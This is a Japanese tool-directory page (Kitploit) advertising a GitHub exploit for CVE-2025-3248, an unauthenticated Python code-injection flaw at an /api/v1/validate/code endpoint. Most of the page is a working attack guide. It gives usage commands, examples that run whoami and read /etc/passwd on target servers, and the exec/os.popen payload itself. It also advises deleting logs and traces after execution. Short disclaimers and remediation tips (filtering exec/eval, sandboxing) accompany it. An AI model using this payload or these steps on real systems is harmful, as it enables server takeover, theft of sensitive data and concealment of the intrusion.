Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3248 — CVE-2025-3248 用のエクスプロイト: 認証されていない API コードエンドポイントに細工した Python ペイロードを注入し、ターゲットサーバー上で任意のコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/12-test-12/cve-2025-3248
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHub12-test-12/cve-2025-3248

CVE-2025-3248

CVE-2025-3248 用のエクスプロイト: 認証されていない API コードエンドポイントに細工した Python ペイロードを注入し、ターゲットサーバー上で任意のコマンドを実行します。

リポジトリを見る
25ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-3248 脆弱性悪用ツール ドキュメント 概要 本ツールは CVE-2025-3248 脆弱性(Pythonベースのコードインジェクション脆弱性)を利用し、悪意のあるペイロードを構築してターゲットサーバーでリモートコマンド実行(RCE)を実現するものです。本脆弱性はあるWebアプリケーションのAPIエンドポイントに存在し、攻撃者は未検証のコード実行ポイントを通じて任意のPythonコードを注入できます。 重要なお知らせ: 本ツールは許可されたセキュリティテスト専用です。無許可のペネトレーションテストは法律違反となる可能性があります。対象システムに関する明確な許可を得ていることを確認してください。 機能 ✅ /api/v1/validate/code エンドポイントを介して悪意のあるPythonコードを注入 ✅ 任意のシステムコマンド(whoami、ls など)の実行に対応 ✅ カスタムタイムアウト(デフォルト10秒) ✅ テキスト/JSON 2種類の出力形式に対応 ✅ 詳細なエラーハンドリングとログ出力 使用方法 基本構文 bash

編集

python cve-2025-3248.py -t <ターゲットURL> -c "<コマンド>" [オプション] パラメータ説明

パラメータ必須説明
-t, --target必須ターゲットURL(形式:http://ip:port)
-c, --command必須実行するシステムコマンド(引用符で囲む必要あり)
-o, --output任意出力形式(text/json、デフォルトはtext)
--timeout任意リクエストタイムアウト(秒、デフォルト10)
-v, --verbose任意詳細な実行ログを表示
使用例
例1:whoamiコマンドを実行(デフォルト出力形式)
bash

編集

python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami" 出力例: テキスト

編集

[+] コマンド実行成功

www-data

例2:JSON出力形式+詳細ログ bash

編集

python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v 出力例: json

編集

{ "status": 200, "content": "root❌0:0:root:/root:/bin/bash\n...", "success": true } 脆弱性の原理 ターゲットサービスは /api/v1/validate/code エンドポイントで code パラメータを受け取る サーバーサイドで入力のセキュリティフィルタリングを行わず、渡されたPythonコードを直接 exec() で実行する 攻撃者は特別なペイロードを構築: python

編集

import os @exec("raise Exception(os.popen('whoami').read())") def f(): pass 例外処理メカニズムを介して os.popen() をトリガーしシステムコマンドを実行 脆弱性のリスク:本脆弱性によりサーバーの完全な制御権が奪われる可能性があり、攻撃者は任意のシステムコマンド実行、機密データの窃取、バックドアの埋め込みなどが可能となります。 セキュリティ警告 ⚠️ 本ツールは許可されたペネトレーションテストのみ ⚠️ 法的リスク:明確な許可なく本ツールを使用したペネトレーションテストは、不正アクセス禁止法などの法律に違反する可能性があります システムリスク:システムコマンドの実行により、サービスクラッシュ、データ消失、システムダウンが発生する可能性があります 検知リスク:攻撃行動はファイアウォール、IDS/IPS により検知・記録される可能性があります 推奨: 管理された環境(ラボ、許可されたテスト環境)でのみ使用 誤操作を避けるため、-v パラメータで詳細ログを確認しながら実行 実行後は速やかに痕跡を削除(ログの削除、セッションのクローズなど) 依存環境 Python 3.7+ requests ライブラリ(事前にインストール必要) bash

編集

pip install requests エラーハンドリング説明

エラーコード原因解決策
[-] ターゲットURL形式エラーURLにスキームまたはホストがないURL形式を確認(例:http://127.0.0.1:8080)
[-] リクエストタイムアウトターゲットの応答がタイムアウト--timeout パラメータ値を増やす
[-] 接続エラーターゲットに到達できない/ファイアウォールによるブロックネットワーク接続を確認
[-] コマンド実行失敗 HTTPステータスコード:403サーバー側の権限拒否ターゲットサービスがコード実行を許可しているか確認
技術詳細
脆弱性の場所:/api/v1/validate/code POST エンドポイント
脆弱性の種類:コードインジェクション(Code Injection)
影響を受けるバージョン:未指定(スクリプトは本脆弱性が存在するバージョンを想定)
修正推奨:
入力を厳密にフィルタリング(exec/eval などの関数を禁止)
サンドボックス環境でユーザー入力コードを実行
APIエンドポイントの権限範囲を制限
免責事項:
このドキュメントはセキュリティ研究および教育目的のみに提供されています。著者は本ツールの使用により生じたいかなる直接的・間接的損害に対しても責任を負いません。法令を遵守し、セキュリティツールを合法的に使用してください。
ツールをダウンロード